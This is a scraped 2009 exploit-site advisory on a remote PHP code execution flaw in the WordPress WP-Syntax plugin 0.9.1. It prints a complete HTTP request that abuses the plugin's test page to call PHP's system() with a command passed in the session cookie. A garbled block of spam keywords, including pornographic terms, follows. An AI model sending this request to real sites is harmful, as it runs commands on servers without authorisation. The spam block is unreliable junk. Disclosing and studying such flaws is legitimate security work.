about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin WP-Syntax Remote PHP Code Execution Vulnerability


Title WordPress Plugin WP-Syntax Remote PHP Code Execution Vulnerability
Published 2009-08-13-12:00AM
Updated 2009-08-21-07:33PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Inj3ct0r
Vulnerable  WPSyntax WPSyntax 0.9.1
Not Vulnerable  WordPress WordPress 2.8.4
Code  Attackers may exploit this issue through a browser.The following example HTTP request is available:GET /wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
Host: localhost
Cookie: PHPSESSID=dir
Connection: close
TXT  t3xt 1t!


Copyright 2007, SecurityDot
Mon, 23 Nov 2009 10:08:10 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.sexvid Vulnerabil msn vulner Hotbugil anal porno tenfour.de Www.Tamilm sexxmaxx SEX TOON ros www0890com Www.sex ma Akobook sex girai www.388ys. www.100lia hotmail xs c hoover musicaholi Teen seex tamil hero Video of m ane girl php-nuke v Www.sex. C pic confixx black girl fswenxin.c guest+book www.25781. Logic /photoalb/ Littlepuss www.worlds www.fengyu shfushi888 Briana ban Www700xxx Www.sextoo remote ker Xnxx com news for C Www.dodhwa t463t Balk j...n=com_ Indian se 4.2.p1 Www.sexvid